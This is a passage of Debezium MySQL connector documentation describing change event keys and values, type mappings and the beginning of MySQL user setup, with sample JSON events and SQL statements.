\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. 
It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#mysql-topic-names[topic names].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or pass:[_]. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or pass:[_]. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nMore details are in the following topics:\n\n* xref:about-keys-in-debezium-mysql-change-events[]\n* xref:about-values-in-debezium-mysql-change-events[]\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mysql-change-events\n\/\/ Title: About keys in {prodname} mysql change events\n[[mysql-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. 
+\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1001`.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mysql-change-events\n\/\/ Title: About values in {prodname} MySQL change events\n[[mysql-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure. \n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-primary-key-updates,Primary key updates>>\n* <<mysql-delete-events,_delete_ events>>\n* <<mysql-tombstone-events,Tombstone events>>\n\n\/\/ Type: continue\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n 
\"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mysql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"op\": \"c\", \/\/ <6>\n \"ts_ms\": 1465491411815, \/\/ <7>\n \"before\": null, \/\/ <8>\n \"after\": { \/\/ <9>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <10>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\n|`io.debezium.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n|4\n|`name`\n|`mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. 
This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|7\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|8\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|9\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|10\n|`source`\na| Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the new row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|===\n\n\/\/ Type: continue\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... 
},
 "payload": {
 "before": { // <1>
 "id": 1004,
 "first_name": "Anne",
 "last_name": "Kretchmar",
 "email": "annek@noanswer.org"
 },
 "after": { // <2>
 "id": 1004,
 "first_name": "Anne Marie",
 "last_name": "Kretchmar",
 "email": "annek@noanswer.org"
 },
 "source": { // <3>
 "version": "{debezium-version}",
 "connector": "mysql",
 "name": "mysql-server-1",
 "ts_sec": 1465581,
 "snapshot": false,
 "db": "inventory",
 "table": "customers",
 "server_id": 223344,
 "gtid": null,
 "file": "mysql-bin.000003",
 "pos": 484,
 "row": 0,
 "thread": 7,
 "query": "UPDATE customers SET first_name='Anne Marie' WHERE id=1004"
 },
 "op": "u", // <4>
 "ts_ms": 1465581029523
 }
}
----

.Descriptions of _update_ event value fields
[cols="1,2,7",options="header"]
|===
|Item |Field name |Description

|1
|`before`
|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne`.

|2
|`after`
|An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`.

|3
|`source`
a|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. The source metadata includes:

* {prodname} version
* Connector name
* binlog name where the event was recorded
* binlog position
* Row within the event
* If the event was part of a snapshot
* Name of the database and table that contain the updated row
* ID of the MySQL thread that created the event (non-snapshot only)
* MySQL server ID (if available)
* Timestamp

If the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.

|4
|`op`
a|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.

|===

[NOTE]
====
Updating the columns for a row's primary/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.
====

// Type: continue
[id="mysql-primary-key-updates"]
=== Primary key updates

An `UPDATE` operation that changes a row's primary key field(s) is known
as a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key.

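For example, assuming the sample `customers` table used throughout this chapter, an update like the following is a primary key change (the new `id` value here is hypothetical):

[source,SQL]
----
-- Instead of an UPDATE event record, this produces a DELETE event record
-- for the old key, a tombstone event, and a CREATE event record for the new key.
UPDATE customers SET id = 2005 WHERE id = 1004;
----
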
These events have the usual structure and content, and in addition, each one has a message header related to the primary key change: \n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n\/\/ Type: continue\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. 
The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[id=\"mysql-tombstone-events\"]\n=== Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-mysql-connectors-map-data-types\n\/\/ Title: How {prodname} MySQL connectors map data types\n[[mysql-data-types]]\n== Data type mappings\n\nThe {prodname} MySQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. The MySQL data type of that column dictates how {prodname} represents the value in the event.\n\nColumns that store strings are defined in MySQL with a character set and collation. The MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events. \n\nThe connector can map MySQL data types to both _literal_ and _semantic_ types.\n\n* *Literal type*: how the value is represented using Kafka Connect schema types\n* *Semantic type*: how the Kafka Connect schema captures the meaning of the field (schema name)\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:mysql-basic-types[]\n* xref:mysql-temporal-types[]\n* xref:mysql-decimal-types[]\n* xref:mysql-boolean-values[]\n* xref:mysql-spatial-types[]\n\nendif::product[]\n\n[id=\"mysql-basic-types\"]\n=== Basic types\n\nThe following table shows how the connector maps basic MySQL data types.\n\n.Descriptions of basic type mappings\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`BOOLEAN, BOOL`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(1)`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(>1)`\n|`BYTES`\na|`io.debezium.data.Bits` +\nThe `length` schema parameter contains an integer that represents the number of bits. The `byte[]` contains the bits in _little-endian_ form and is sized to contain the specified number of bits. For example, where `n` is bits: +\n`numBytes = n\/8 + (n%8== 0 ? 
0 : 1)`

|`TINYINT`
|`INT16`
a|_n/a_

|`SMALLINT[(M)]`
|`INT16`
a|_n/a_

|`MEDIUMINT[(M)]`
|`INT32`
a|_n/a_

|`INT, INTEGER[(M)]`
|`INT32`
a|_n/a_

|`BIGINT[(M)]`
|`INT64`
a|_n/a_

|`REAL[(M,D)]`
|`FLOAT32`
a|_n/a_

|`FLOAT[(M,D)]`
|`FLOAT64`
a|_n/a_

|`DOUBLE[(M,D)]`
|`FLOAT64`
a|_n/a_

|`CHAR[(M)]`
|`STRING`
a|_n/a_

|`VARCHAR(M)`
|`STRING`
a|_n/a_

|`BINARY[(M)]`
|`BYTES` or `STRING`
a|_n/a_ +
Either the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.

|`VARBINARY(M)`
|`BYTES` or `STRING`
a|_n/a_ +
Either the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.

|`TINYBLOB`
|`BYTES` or `STRING`
a|_n/a_ +
Either the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.

|`TINYTEXT`
|`STRING`
a|_n/a_

|`BLOB`
|`BYTES` or `STRING`
a|_n/a_ +
Either the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.

|`TEXT`
|`STRING`
a|_n/a_

|`MEDIUMBLOB`
|`BYTES` or `STRING`
a|_n/a_ +
Either the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.

|`MEDIUMTEXT`
|`STRING`
a|_n/a_

|`LONGBLOB`
|`BYTES` or `STRING`
a|_n/a_ +
Either the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.

|`LONGTEXT`
|`STRING`
a|_n/a_

|`JSON`
|`STRING`
a|`io.debezium.data.Json` +
Contains the string representation of a `JSON` document, array, or scalar.

|`ENUM`
|`STRING`
a|`io.debezium.data.Enum` +
The `allowed` schema parameter contains the comma-separated list of allowed values.

|`SET`
|`STRING`
a|`io.debezium.data.EnumSet` +
The `allowed` schema parameter contains the comma-separated list of allowed values.

|`YEAR[(2\|4)]`
|`INT32`
|`io.debezium.time.Year`

|`TIMESTAMP[(M)]`
|`STRING`
a|`io.debezium.time.ZonedTimestamp` +
In link:https://www.iso.org/iso-8601-date-and-time-format.html[ISO 8601] format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.

|===

[id="mysql-temporal-types"]
=== Temporal types

Excluding the `TIMESTAMP` data type, MySQL temporal types depend on the value of the `time.precision.mode` connector configuration property. For `TIMESTAMP` columns whose default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value `1970-01-01 00:00:00` is used as the default value in the Kafka Connect schema.

MySQL allows zero-values for `DATE`, `DATETIME`, and `TIMESTAMP` columns because zero-values are sometimes preferred over null values.

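For example, a hypothetical table definition like the following permits zero-value dates in both a nullable column and a `NOT NULL` column (accepting zero-values typically requires a `sql_mode` that does not include `NO_ZERO_DATE`):

[source,SQL]
----
CREATE TABLE orders_archive (
  shipped_on DATE,                               -- nullable, zero-value allowed
  ordered_on DATE NOT NULL DEFAULT '0000-00-00'  -- NOT NULL, zero-value default
);
----
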
The MySQL connector represents zero-values as null values when the column definition allows null values, or as the epoch day when the column does not allow null values.

.Temporal values without time zones
The `DATETIME` type represents a local date and time such as "2018-01-13 09:48:27". As you can see, there is no time zone information. Such columns are converted into epoch milliseconds or microseconds based on the column's precision by using UTC. The `TIMESTAMP` type represents a timestamp without time zone information. It is converted by MySQL from the server (or session's) current time zone into UTC when writing and from UTC into the server (or session's) current time zone when reading back the value. For example:

* `DATETIME` with a value of `2018-06-20 06:37:03` becomes `1529476623000`.
* `TIMESTAMP` with a value of `2018-06-20 06:37:03` becomes `2018-06-20T13:37:03Z`.

`TIMESTAMP` columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC, based on the server (or session's) current time zone. The time zone is queried from the server by default. If that fails, the time zone must be specified explicitly with the `serverTimezone` MySQL configuration option. For example, if the database's time zone (either globally or configured for the connector by means of the `serverTimezone` option) is "America/Los_Angeles", the `TIMESTAMP` value "2018-06-20 06:37:03" is represented by a `ZonedTimestamp` with the value "2018-06-20T13:37:03Z".

The time zone of the JVM running Kafka Connect and Debezium does not affect these conversions.

More details about properties related to temporal values are in the documentation for {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].

time.precision.mode=adaptive_time_microseconds (default)::
The MySQL connector determines the literal type and semantic type based on the column's data type definition so that events represent exactly the values in the database. All time fields are in microseconds. Only positive `TIME` field values in the range of `00:00:00.000000` to `23:59:59.999999` can be captured correctly.
+
.Mappings when `time.precision.mode=adaptive_time_microseconds`
[cols="25%a,20%a,55%a",options="header",subs="+attributes"]
|===
|MySQL type |Literal type |Semantic type

|`DATE`
|`INT32`
a|`io.debezium.time.Date` +
Represents the number of days since the epoch.

|`TIME[(M)]`
|`INT64`
a|`io.debezium.time.MicroTime` +
Represents the time value in microseconds and does not include time zone information. MySQL allows `M` to be in the range of `0-6`.

|`DATETIME, DATETIME(0), DATETIME(1), DATETIME(2), DATETIME(3)`
|`INT64`
a|`io.debezium.time.Timestamp` +
Represents the number of milliseconds past the epoch and does not include time zone information.

|`DATETIME(4), DATETIME(5), DATETIME(6)`
|`INT64`
a|`io.debezium.time.MicroTimestamp` +
Represents the number of microseconds past the epoch and does not include time zone information.

|===

time.precision.mode=connect::
The MySQL connector uses defined Kafka Connect logical types. This approach is less precise than the default approach: the events could lose precision if the database column has a _fractional second precision_ value of greater than `3`. Only values in the range of `00:00:00.000` to `23:59:59.999` can be handled. Set `time.precision.mode=connect` only if you can ensure that the `TIME` values in your tables never exceed the supported ranges.
The `connect` setting is expected to be removed in a future version of {prodname}.
+
.Mappings when `time.precision.mode=connect`
[cols="25%a,20%a,55%a",options="header",subs="+attributes"]
|===
|MySQL type |Literal type |Semantic type

|`DATE`
|`INT32`
a|`org.apache.kafka.connect.data.Date` +
Represents the number of days since the epoch.

|`TIME[(M)]`
|`INT64`
a|`org.apache.kafka.connect.data.Time` +
Represents the time value in milliseconds since midnight and does not include time zone information.

|`DATETIME[(M)]`
|`INT64`
a|`org.apache.kafka.connect.data.Timestamp` +
Represents the number of milliseconds since the epoch, and does not include time zone information.

|===

[id="mysql-decimal-types"]
=== Decimal types

{prodname} connectors handle decimals according to the setting of the {link-prefix}:{link-mysql-connector}#mysql-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property].

decimal.handling.mode=precise::
+
.Mappings when `decimal.handling.mode=precise`
[cols="30%a,15%a,55%a",options="header",subs="+attributes"]
|===
|MySQL type |Literal type |Semantic type

|`NUMERIC[(M[,D])]`
|`BYTES`
a|`org.apache.kafka.connect.data.Decimal` +
The `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.

|`DECIMAL[(M[,D])]`
|`BYTES`
a|`org.apache.kafka.connect.data.Decimal` +
The `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.

|===

decimal.handling.mode=double::
+
.Mappings when `decimal.handling.mode=double`
[cols="30%a,30%a,40%a",options="header",subs="+attributes"]
|===
|MySQL type |Literal type |Semantic type

|`NUMERIC[(M[,D])]`
|`FLOAT64`
a|_n/a_

|`DECIMAL[(M[,D])]`
|`FLOAT64`
a|_n/a_

|===

decimal.handling.mode=string::
+
.Mappings when `decimal.handling.mode=string`
[cols="30%a,30%a,40%a",options="header",subs="+attributes"]
|===
|MySQL type |Literal type |Semantic type

|`NUMERIC[(M[,D])]`
|`STRING`
a|_n/a_

|`DECIMAL[(M[,D])]`
|`STRING`
a|_n/a_

|===

[id="mysql-boolean-values"]
=== Boolean values

MySQL handles the `BOOLEAN` value in a specific way:
internally, a `BOOLEAN` column is mapped to the `TINYINT(1)` data type.
When a table is created while the connector is streaming, {prodname} receives the original DDL and uses the proper `BOOLEAN` mapping.
During snapshots, {prodname} executes `SHOW CREATE TABLE` to obtain table definitions that return `TINYINT(1)` for both `BOOLEAN` and `TINYINT(1)` columns.

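A minimal illustration of the ambiguity, using a hypothetical table:

[source,SQL]
----
CREATE TABLE feature_flags (enabled BOOLEAN);

-- During a snapshot the connector sees only the output of
-- SHOW CREATE TABLE, which reports the column as tinyint(1):
SHOW CREATE TABLE feature_flags;
----
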
{prodname} then has no way to obtain the original type mapping and so maps to `TINYINT(1)`.

ifdef::community[]
You can configure the out-of-the-box {link-prefix}:{link-custom-converters}[`TinyIntOneToBooleanConverter` custom converter], which either maps all `TINYINT(1)` columns to `BOOLEAN` or, if its `selector` parameter is set, maps only the enumerated subset of columns, specified as comma-separated regular expressions.
endif::community[]

Following is an example configuration:

[source,properties]
----
converters=boolean
boolean.type=io.debezium.connector.mysql.converters.TinyIntOneToBooleanConverter
boolean.selector=db1.table1.*, db1.table2.column1
----

[id="mysql-spatial-types"]
=== Spatial types

Currently, the {prodname} MySQL connector supports the following spatial data types.

.Description of spatial type mappings
[cols="35%a,15%a,50%a",options="header",subs="+attributes"]
|===
|MySQL type |Literal type |Semantic type

|`GEOMETRY, +
LINESTRING, +
POLYGON, +
MULTIPOINT, +
MULTILINESTRING, +
MULTIPOLYGON, +
GEOMETRYCOLLECTION`
|`STRUCT`
a|`io.debezium.data.geometry.Geometry` +
Contains a structure with two fields:

* `srid (INT32)`: spatial reference system ID that defines the type of geometry object stored in the structure
* `wkb (BYTES)`: binary representation of the geometry object encoded in the Well-Known-Binary (wkb) format. See the link:https://www.opengeospatial.org/standards/sfa[Open Geospatial Consortium] for more details.

|===

// Type: assembly
// ModuleID: setting-up-mysql-to-run-a-debezium-connector
// Title: Setting up MySQL to run a {prodname} connector
[[setting-up-mysql]]
== Set up

Some MySQL setup tasks are required before you can install and run a {prodname} connector.

ifdef::product[]
Details are in the following sections:

* xref:creating-a-mysql-user-for-a-debezium-connector[]
* xref:enabling-the-mysql-binlog-for-debezium[]
* xref:enabling-mysql-gtids-for-debezium[]
* xref:configuring-mysql-session-timeouts-for-debezium[]
* xref:enabling-query-log-events-for-debezium-mysql-connectors[]

endif::product[]

// Type: procedure
// ModuleID: creating-a-mysql-user-for-a-debezium-connector
// Title: Creating a MySQL user for a {prodname} connector
[[mysql-creating-user]]
=== Creating a user

A {prodname} MySQL connector requires a MySQL user account. This MySQL user must have appropriate permissions on all databases for which the {prodname} MySQL connector captures changes.

.Prerequisites

* A MySQL server.
* Basic knowledge of SQL commands.

.Procedure

. Create the MySQL user:
+
[source,SQL]
----
mysql> CREATE USER 'user'@'localhost' IDENTIFIED BY 'password';
----

. Grant the required permissions to the user:
+
[source,SQL]
----
